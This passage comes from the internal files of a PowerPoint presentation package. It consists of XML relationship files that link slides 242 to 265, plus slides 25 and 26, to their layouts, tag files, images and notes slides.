<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2241.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag937.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag936.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag935.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag934.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide242.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2251.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag941.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag940.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag939.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag938.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide243.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2261.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag945.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag944.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag943.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag942.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide244.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2271.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag949.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag948.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag947.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag946.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide245.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2281.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag950.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide246.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag954.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag953.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2291.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag952.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag951.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide247.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2301.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide248.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2311.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide249.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2321.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag960.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag959.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag958.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag957.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag956.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag955.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout81.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag90.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag89.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag88.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag87.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide250.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag969.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag968.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag967.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag965.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag964.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag963.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag962.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2331.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag973.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag972.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag971.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag970.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag961.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide251.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2342.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag976.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag975.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag974.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2352.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag979.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag978.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag977.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide253.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2361.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag983.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag982.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag981.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag980.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide254.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2371.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag988.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag987.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag986.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag985.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag984.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide255.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2381.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag992.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag991.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag990.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag989.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide256.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2391.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag996.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag995.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag994.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag993.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide257.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2401.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1000.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag999.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag998.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag997.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide258.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2411.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1004.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1003.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1002.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1001.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide259.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide25.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2421.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1008.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1007.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1006.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1005.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout91.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag95.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag94.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag93.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag92.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide260.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2431.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1012.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1011.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1010.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1009.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide261.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2441.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1016.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1015.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1014.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1013.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide262.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2451.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1020.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1019.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1018.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1017.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide263.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2461.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1024.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1023.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1022.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1021.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide264.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2471.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1028.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1027.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1026.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1025.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide265.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2481.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1032.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1031.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1030.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1029.xml"/></Relationships>
</file>

